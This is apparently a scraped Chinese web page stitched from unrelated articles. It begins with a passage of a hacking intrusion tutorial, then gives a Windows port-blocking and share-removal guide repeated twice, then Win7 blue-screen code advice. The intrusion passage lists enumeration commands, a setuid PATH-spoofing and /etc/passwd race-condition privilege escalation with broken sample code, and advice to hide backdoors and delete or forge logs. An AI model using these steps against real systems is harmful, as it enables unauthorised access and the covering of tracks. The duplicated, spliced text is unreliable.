2,显示所有的SNMP变量内容
c:snmputil walk localhost public .1.3
2UNIX类系统的查点技术
1,$showmount -e www.target.com //前提2049号端口开着(NFS)
2,$finger @www.target.com //还有rusers
3, $telnet www.target.com 25
vrfy root //证实是否有root
expn adm
quit
黑客入侵渗透第二步:具体的分析漏洞
针对特定目标进行了以上分析后,总结出最好的入侵思路,选择入侵工具,做好入侵的准备工作是必须,有时入侵时间的选择也是很重要的,因为会涉及到正常的公司网络的正常通信,甚至会使恶意的网络在你入侵测试就发生了,最直接的漏洞利用方法,我认为是溢出漏洞了,因为他直接就可以得到对方的系统权限,返回一个 和在本地一样的SHELL环境,此时无所不能:溢出攻击的分类有:
1,WINDOWS下的和UNIN下的
一般原理,就用户提交的参数范围超过了在内存中保存的本地变量的范围,而程序 或者系统并没有对输入的参数进行合理的长度检查,导致了被调用函数的返回地址 被覆盖,如果用一个跳转到我们提交的shellcode的地方的地址代替,那么我们的s hellcode就可以运行,成功得到了目标的系统权限。此外还有格式化串漏洞,导致这个漏洞的原因是在处理用户数据的参数时没有过滤 用户提交的,格式化符号,例如%n这个将允许输出的参数的个数保存在内存中,恶意构造此漏洞用户将会向内存的任何位SHELLCODE的地址。
2,常见漏洞类型
UNIX下的本地漏洞很多,挖掘起来也较容易,他主要有以下几种类型:
1,环境欺骗
一般指PATH环境变量的欺骗,就是说如果一个特权的程序执行了一个外部的命令,那么我们可以简单的构造这个外部命令程序,然后修改PATH使这个特权程序能够去 首先执行我们构造的外部命令程序,而这个外部的命令程序是一个去得SHELL的程序
例如:
bash$cat >ps <
>#!/bin/sh
>EOF
而这个特权程序是:
bash$cat >test.c <
>int main()
>{
>setuid(0);
>system("ps -ef"); /*程序调用了外部命令,但没有给出这个命令的绝对路径,
这个是PATH欺骗的前提*/
>}
>EOF
编译后的test文件具有s为,属主是root.这样设置是因为程序test执行时会以root 身份运行特权命令,这样在他运行时由于调用的是我们伪造的ps命令程序,所以会 产生一个root权限的SHELL环境。
2,竞争条件
一般指时序竞争,例如:
fp=fopen("test.log","w+");
chown("test.log",getuid(),getgid());
原理也很简单,就是如果当前的程序运行时权限是euid=root,uid=当前用户,由于文件test.log在打开会执行将文件的属主改为当前用户,所以我们可以在执行完fopen之后,chown之前删了test.log,而创建了一个到/etc/passwd的符号链接,这样就会将/etc/passwd文件的属主改为当前的用户,当前的用户就可以在passwd文件中将自己的uid改为0,这样就取得了system权限。
3,溢出和格式串漏洞
导致这些漏洞的数据来源主要是:
1,命令行参数
2,环境变量
3,特定格式文件的读取
4,用户交互十的输入
缓冲溢出的漏洞是有以下一些函数引起的:
1,strcpy
2, strcat
3, sprintf
4, vsprintf
格式化串的漏洞和以下一些函数有关:
1, print/vprintf
2, fprintf/vfprintf
3, sprintf/vsprintf
4, snprintf/vsnprintf
利用工具有objdump,elfedump查看目标是否有不安全的以上不安全的函数,如果有可以进行黑盒测试,进而进行返汇编分析程序的上下文和执行流程,利用strings可以静态查找目标的环境变量。
黑客入侵渗透第三步:攻击WWW
现在的入侵事件,攻击WWW居多,原因也很简单,那就是程序员在编写WEB脚本程序时更本不注重安全因素,导致了上传shell,提升权限之类的严重后果,入侵渗透测试主要通过以下几个方面进行测试:
1,搜索SQL注入点;
2,搜索特定目录和文件,例如:上传程序文件,这个利用价值也很大;
3,寻找管理员登陆网页,进行字典或者SQL饶过入侵;
4,寻找WEB程序的源代码,进行漏洞挖掘,主要涉及的漏洞类型有:SQL注入,文件包含漏洞,目录跳转漏洞,以脚本文件格式保存错误日志漏洞,上传漏洞;
5,在代码审核时,不要忘记对程序员犯的逻辑错误进行查看,例如:函数书写错误
6,总是,漏洞的成因归根到底是由于对用户的输入没有进行严格的过滤。
黑客入侵渗透第四步:其他的入侵
1,针对数据库MSSQL,MYSQL,ORACLE等数据库的入侵;
2,针对路由,防火墙,IDS等网络设备的渗透
3,无线入侵渗透
黑客入侵渗透第五步:入侵渗透以后
1,在成功得到系统级别的权限以后,就要在目标留下后门方便以后进入,当然清楚日志是最为重要的收尾工作,这些方面也有很多的技术可以讨论,例如:后门的隐藏(WIN下的ADS是一个不错的隐藏程序的东东,日志的有选择删除及其伪造等等。
浏览量:3
下载量:0
时间:
黑客不孔不入,怎样防止黑客入侵呢,小编推荐你以下这篇文章,妈妈再也不要担心黑客入侵了。
我们的防火墙是不是经常有人来攻击你XXX端口呢?如果关掉相应没有用处的端口不就好了吗? 一般来说,我们采用一些功能强大的反黑软件和防火墙来保证我们的系统安全,本文拟用一种简易的办法——通过限制端口来帮助大家防止非法入侵-----如何关闭系统中的一些端口,同时如何关闭WINDOWS 下的默认共享C$、D$、Admin$、IPC$等等。
非法入侵的方式
简单说来,非法入侵的方式可粗略分为4种:
扫描端口,通过已知的系统Bug攻入主机。
种植木马,利用木马开辟的后门进入主机。
采用数据溢出的手段,迫使主机提供后门进入主机。
利用某些软件设计的漏洞,直接或间接控制主机。
非法入侵的主要方式是前两种,尤其是利用一些流行的黑客工具,通过第一种方式攻击主机的情况最多、也最普遍;而对后两种方式来说,只有一些手段高超的黑客才利用,波及面并不广泛,而且只要这两种问题一出现,软件服务商很快就会提供补丁,及时修复系统。
因此,如果能限制前两种非法入侵方式,就能有效防止利用黑客工具的非法入侵。而且前两种非法入侵方式有一个共同点,就是通过端口进入主机。
端口就像一所房子(服务器)的几个门一样,不同的门通向不同的房间(服务器提供的不同服务)。我们常用的FTP默认端口为21,而WWW网页一般默认端口是80。但是有些马虎的网络管理员常常打开一些容易被侵入的端口服务,比如139等;还有一些木马程序,比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么,只要我们把自己用不到的端口全部封锁起来,不就杜绝了这两种非法入侵吗?
这里举例关闭的端口有,135,137,138,139,445,1025,2475,3127,6129,3389,593,还有TCP,其他我就不一一指出了。
具体操作如下:
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口。
第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
第三步,再重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。
第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。
第五步,进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。
这时候你就可以电脑了,重新启动后,电脑中上述网络端口就被关闭了,在这时候病毒和黑客应该是已经不能连上这些端口了,从而保护了你的电脑。
以下要说的是怎样关闭WINDOWS下的默认共享C$、D$、Admin$和IPC$等等。
大家应该知道在WINDOWS 2000和WINDOWS XP下会有默认的共享,病毒和黑客也可以通过这个途径进入你的电脑,从而来毁坏你的文件甚至远程控制你的电脑,这时就应该删除这些默认的共享(其实这些默认的共享对于你个人来说,只是有百害而无一利,这时我个人的看法噢,有意见大家提哟)。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
这里要先说WINDOWS XP的操作系统,XP可不比2000那么容易对付啰,在我还没找到方法之前,在QQ上碰到“封情绝爱”,问了一下,没想到当时他也没有想到方法,过了15钟左右,当时我在网上已经查到用net share *$ /del这个方法时,“封情”也同时告诉我要用这个命令,真是英雄所见略同。
如果你只是偶尔很少用的电脑,你可以在“开始”菜单里选择“运行”,然后在里面输入“net share *$ /del”(*代表你要删除的共享的名称)就可以了。但是在下次开机以后还会有这个默认的共享,怎么样才能彻底完全的在开机后就关闭这些默认共享呢,Follow me ,let’s go.
现在就要说如何在开机后,WINDOWS会自动关闭所有的默认共享,WINDOWS 2000和WINDOWS XP在这里也是大同小异,在“开始”菜单里选择“运行”,填入“regedit”,打开注册表[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]分支,在其下新建“字符串值”,命名可随意,比如“delshareC$”,鼠标右键单击,在弹出的快捷菜单中左键单击“修改”,在接着出现的“编辑字符串”窗口的“数值数据”一栏中输入“net share C$ /del”(不包括引号)按“确定”按钮。同理添加“字符串值”如“delshareD$”,“数值数据”为“net share D$ /del”等,有几个分区就加到哪为止,包括“net share Admin$ /del”等等,注意:这里有大小写之分。之后保存注册表重启计算机,就能实现开机自动关闭这些特殊共享资源了。
但是,大家有没有发现,“net share IPC$ /del”这个命令对于“IPC$”根本就不起任何作用,它还是保持着默认共享怎么办???(实际上做到这一步已经够了,无需在关闭IPC$了)
在这里呢,我还要感谢我的培训老师“Mozart”,是他指导了我怎样才能永久关闭IPC$和默认共享依赖的服务:lanmanserver即server服务,还需要到“控制面板”里的“管理工具”内,找到“服务”在到“server服务”(右击)进入“属性”,点击“常规”,在“启动类型”这一项中选择“已禁用”,这样就关闭了IPC$的默认共享。但是这就会产生一定的负面效应,一旦你关闭了了IPC$的默认共享,很多的Server服务你就不能利用,同时也可能会发生你不能访问局域网内的其他电脑,请慎用!
浏览量:2
下载量:0
时间:
欢迎大家来到读文网,本文教你电脑怎样防止被黑客入侵,欢迎大家阅读。
我们的防火墙是不是经常有人来攻击你XXX端口呢?如果关掉相应没有用处的端口不就好了吗? 一般来说,我们采用一些功能强大的反黑软件和防火墙来保证我们的系统安全,本文拟用一种简易的办法——通过限制端口来帮助大家防止非法入侵-----如何关闭系统中的一些端口,同时如何关闭WINDOWS 下的默认共享C$、D$、Admin$、IPC$等等。
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口。
第一步,点击“开始”菜单/设置/控制面板/管理工具,双击打开“本地安全策略”,选中“IP 安全策略,在本地计算机”,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“创建 IP 安全策略”,于是弹出一个向导。在向导中点击“下一步”按钮,为新的安全策略命名;再按“下一步”,则显示“安全通信请求”画面,在画面上把“激活默认相应规则”左边的钩去掉,点击“完成”按钮就创建了一个新的IP 安全策略。
第二步,点击“确定”后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
第三步,再重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“确定”按钮。
第四步,在“新规则属性”对话框中,选择“新 IP 筛选器列表”,然后点击其左边的圆圈上加一个点,表示已经激活,最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中,把“使用添加向导”左边的钩去掉,点击“添加”按钮,添加“阻止”操作:在“新筛选器操作属性”的“安全措施”选项卡中,选择“阻止”,然后点击“确定”按钮。
第五步,进入“新规则属性”对话框,点击“新筛选器操作”,其左边的圆圈会加了一个点,表示已经激活,点击“关闭”按钮,关闭对话框;最后回到“新IP安全策略属性”对话框,在“新的IP筛选器列表”左边打钩,按“确定”按钮关闭对话框。在“本地安全策略”窗口,用鼠标右击新添加的 IP 安全策略,然后选择“指派”。
这时候你就可以电脑了,重新启动后,电脑中上述网络端口就被关闭了,在这时候病毒和黑客应该是已经不能连上这些端口了,从而保护了你的电脑。
以下要说的是怎样关闭WINDOWS下的默认共享C$、D$、Admin$和IPC$等等。
大家应该知道在WINDOWS 2000和WINDOWS XP下会有默认的共享,病毒和黑客也可以通过这个途径进入你的电脑,从而来毁坏你的文件甚至远程控制你的电脑,这时就应该删除这些默认的共享(其实这些默认的共享对于你个人来说,只是有百害而无一利,这时我个人的看法噢,有意见大家提哟)。
第二步,右击该IP安全策略,在“属性”对话框中,把“使用添加向导”左边的钩去掉,然后单击“添加”按钮添加新的规则,随后弹出“新规则属性”对话框,在画面上点击“添加”按钮,弹出IP筛选器列表窗口;在列表中,首先把“使用添加向导”左边的钩去掉,然后再点击右边的“添加”按钮添加新的筛选器。
第三步,进入“筛选器属性”对话框,首先看到的是寻址,源地址选“任何 IP 地址”,目标地址选“我的 IP 地址”;点击“协议”选项卡,在“选择协议类型”的下拉列表中选择“TCP”,然后在“到此端口”下的文本框中输入“135”,点击“确定”按钮,这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
这里要先说WINDOWS XP的操作系统,XP可不比2000那么容易对付啰,在我还没找到方法之前,在QQ上碰到“封情绝爱”,问了一下,没想到当时他也没有想到方法,过了15钟左右,当时我在网上已经查到用net share *$ /del这个方法时,“封情”也同时告诉我要用这个命令,真是英雄所见略同。
如果你只是偶尔很少用的电脑,你可以在“开始”菜单里选择“运行”,然后在里面输入“net share *$ /del”(*代表你要删除的共享的名称)就可以了。但是在下次开机以后还会有这个默认的共享,怎么样才能彻底完全的在开机后就关闭这些默认共享呢,Follow me ,let’s go.
现在就要说如何在开机后,WINDOWS会自动关闭所有的默认共享,WINDOWS 2000和WINDOWS XP在这里也是大同小异,在“开始”菜单里选择“运行”,填入“regedit”,打开注册表[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]分支,在其下新建“字符串值”,命名可随意,比如“delshareC$”,鼠标右键单击,在弹出的快捷菜单中左键单击“修改”,在接着出现的“编辑字符串”窗口的“数值数据”一栏中输入“net share C$ /del”(不包括引号)按“确定”按钮。同理添加“字符串值”如“delshareD$”,“数值数据”为“net share D$ /del”等,有几个分区就加到哪为止,包括“net share Admin$ /del”等等,注意:这里有大小写之分。之后保存注册表重启计算机,就能实现开机自动关闭这些特殊共享资源了。
但是,大家有没有发现,“net share IPC$ /del”这个命令对于“IPC$”根本就不起任何作用,它还是保持着默认共享怎么办???(实际上做到这一步已经够了,无需在关闭IPC$了)
在这里呢,我还要感谢我的培训老师“Mozart”,是他指导了我怎样才能永久关闭IPC$和默认共享依赖的服务:lanmanserver即server服务,还需要到“控制面板”里的“管理工具”内,找到“服务”在到“server服务”(右击)进入“属性”,点击“常规”,在“启动类型”这一项中选择“已禁用”,这样就关闭了IPC$的默认共享。但是这就会产生一定的负面效应,一旦你关闭了了IPC$的默认共享,很多的Server服务你就不能利用,同时也可能会发生你不能访问局域网内的其他电脑,请慎用!
浏览量:2
下载量:0
时间:
win7电脑有哪些蓝屏代码?蓝屏是使用电脑过程中经常遇到的,你知道蓝屏是由什么原因造成的吗?其实,造成蓝屏的原因很多,下面读文网小编就为大家收集整理了一些Win7蓝屏代码的含义,希望希望可以帮助到大家。
1、0X0000007E、0X0000008E代码
这两个代码一般多是病毒造成的,只要将系统杀杀毒即可解决了,正常模式进不去的话可以开机的时候按住F8进入安全模式,不过也有可能是内存造成的,可以尝试重新插拔内存,一般这代码内存损坏概率不大。
2、0X0000007B代码
这个代码通常原因在I/O系统的初始化过程中出现问题(是引导驱动器或文件系统),说明你的机器配置还是比较新的,作为老的系统盘,不认这么新的硬盘接口,所以得进BIOS把硬盘模式改成IDE兼容模式,不过现在很多人都用ghost版的操作系统,所以一般比较新的ghost盘是不存在这个问题的。如果找不到IDE这项的问题,因为很多主板标明这项的措辞不太一样 有些写着AHCI和Compatibility,这个AHCI就等于是SATA模式,Compatibility相当于IDE模式。
如果操作系统使用了一段时间了,然后出现这个问题了,那就是电脑中病毒了,开机按F8,选择最后一次正确的配置,恢复不到正常模式的话就重新做系统。
3、coooo21a代码
一般以C开头的故障,报未知硬件故障,不过出这类C开头的代码多半与硬件无关。基本是与系统同时启动的一些驱动!或者服务的问题。
4、0X000000D1代码
出现这个代码一般是和显卡有关,可能是显卡损坏了或者安装了不太兼容的显卡驱动造成的,如果有出现花屏现象的朋友们先跟朋友借个显卡插上试一下,或者主机有集成显卡的,用集成显卡试一下,如果平时没有花屏现象,那就更换买机器的时候自带的显卡驱动试一下即可。
5、0X000000ED代码
这个代码故障主要是和硬盘有关系,系统概率比较大,硬盘真坏的概率比较小。有可能是卷有问题还有可能是硬盘坏了。
修复方法是找原版的系统安装盘的方法,把系统盘放入光驱,启动到安装界面,选择按R 进入控制台修复,进入控制台后会出现提示符C: 大家在这里输入 chkdsk -r 然后它就会自动检测并修复问题了,修复完成之后重新启动计算机就可以进入系统了,进入系统之后最好是要先杀毒,然后再重新启动一下试一下,如果正常了就没问题,如果还出现这个代码的话就说明硬盘有问题,建议更换硬盘吧。
6、0X0000000A代码
错误分析:主要是由问题的驱动程序、有缺陷或不兼容的硬件与软件造成的。从技术角度讲。 表明在内核模式中存在以太高的进程内部请求级别(IRQL)访问其没有权限访问的内存地址。
如果每次蓝屏都是这个代码就要想一下最近是不是更新了什么软件或者什么驱动了,把它卸载再看一下,一般就能解决,实在没办法就重做系统吧。
7、0X00000050代码
这个主要是说明硬件故障,硬盘的可能性很大,如果出现重启之后还伴随着出现0A、7E、8E这样的代码,那有很大的可能说明内存坏了。如果每次都出这一个代码,剑客可以首先换一块硬盘试一下机器能不能正常启动,如果测试硬盘没问题,再试内存,内存也试过的话,换CPU,总之这一定是硬件故障导致的,要检查好硬件问题才可解决问题。
8、每次的蓝屏代码不一样
出现这样的原因基本上就是硬件造成的,尤其是内存,建议更换内存尝试一下,第二可能性是CPU,其他硬件基本上不会造成蓝屏代码随便变的情况,更多的蓝屏代码如果你不知道的话可以用windows蓝屏代码查询工具去查询一下就可以对症下药解决了哦。
当遇到蓝屏时我们不要急着重启,记住STOP后面的停机码,在百度搜蓝屏代码大全就可以知道为何出现蓝屏
电脑蓝屏的原因有很多大概的有以下几点
1、杀毒不彻底,(360杀毒,金山毒霸,卡巴斯基等等,下载其中任意一款杀毒软件,全盘扫描)
2、电脑系统有顽固的病毒和木马或蠕虫干扰,或者丢失了系统文件(360系统急救箱或金山急救箱,金山网盾等等,其中任意一款,全盘查杀,再修复)
3、软件需要更新,(360管家,软件升级,下载,覆盖安装,winrar可以不升)
4、系统有新的漏洞等待安装,(修补高危和重要的,其它设置为:忽略)
5、多余的同类软件安装,(360管家,软件卸载,找到卸载,再:强力清扫)
6、显卡或内存cpu的接触不良和松动或有灰尘覆盖,(拔下橡皮擦擦)
7、内存cpu过热,散热性不好!(开机时间不要太长,关机散热)
8、如果还是进不去,说明系统文件丢失了!或者系统内存有很严重的错误了!
9、试试开机后按F8,回车,回车,进安全模式里,最后一次正确配置,按下去试试!或者,进安全模式,到桌面后,全盘杀毒!
10、玩游戏蓝屏,一般就是系统不支持这款游戏!(更换游戏版本或换xp系统)
11、下载的游戏,播放器,输入法,下载工具,浏览器等,程序不稳定!(卸载重装或升级至最新版本)
12、如果还是不行,需要“一键还原”系统或“重装系统”了 !
检查是否有多款播放器安装,软件不兼容!会导致蓝屏!
或者有其他冲突的同类软件安装卸载!比如:杀毒重复,浏览器,游戏,输入法有同类多余的,卸载多余的,只留一款!这些每一个可能都去试试,
看过“win7电脑有哪些蓝屏代码”
浏览量:3
下载量:0
时间:
UE在第一次运行的时候,就会向系统安装它的驱动,这个驱动可能会造成蓝屏,那么你知道电脑蓝屏提示错误代码0x00000018怎么办吗?下面是读文网小编整理的一些关于电脑蓝屏提示错误代码0x00000018的相关资料,供你参考。
1、下载psexec.exe工具。
2、删除Win7注册表中的首先,删除C:WindowsSystem32drivershpmobiledisk.sys这个文件;
3、 请以管理员身份运行命令提示符;如果是以管理员权限登录的系统,可直接在“运行”中输入“CMD”;
4、把psexec.exe工具拷贝到System32;
5、 在命令提示符窗口中输入:psexec -i -d -s regedit.exe;
6、 在弹出的交互式服务对话框检测窗口中点击 ----显示消息;
7、 在弹出的注册表编辑器中轻松删除以上两个注册表项:
HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_HPMOBILEDISK
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_HPMOBILEDISK;
8、 重启两遍,此时折磨人的蓝屏就消失。
电脑蓝屏提示错误代码0x00000018的相关
浏览量:12
下载量:0
时间: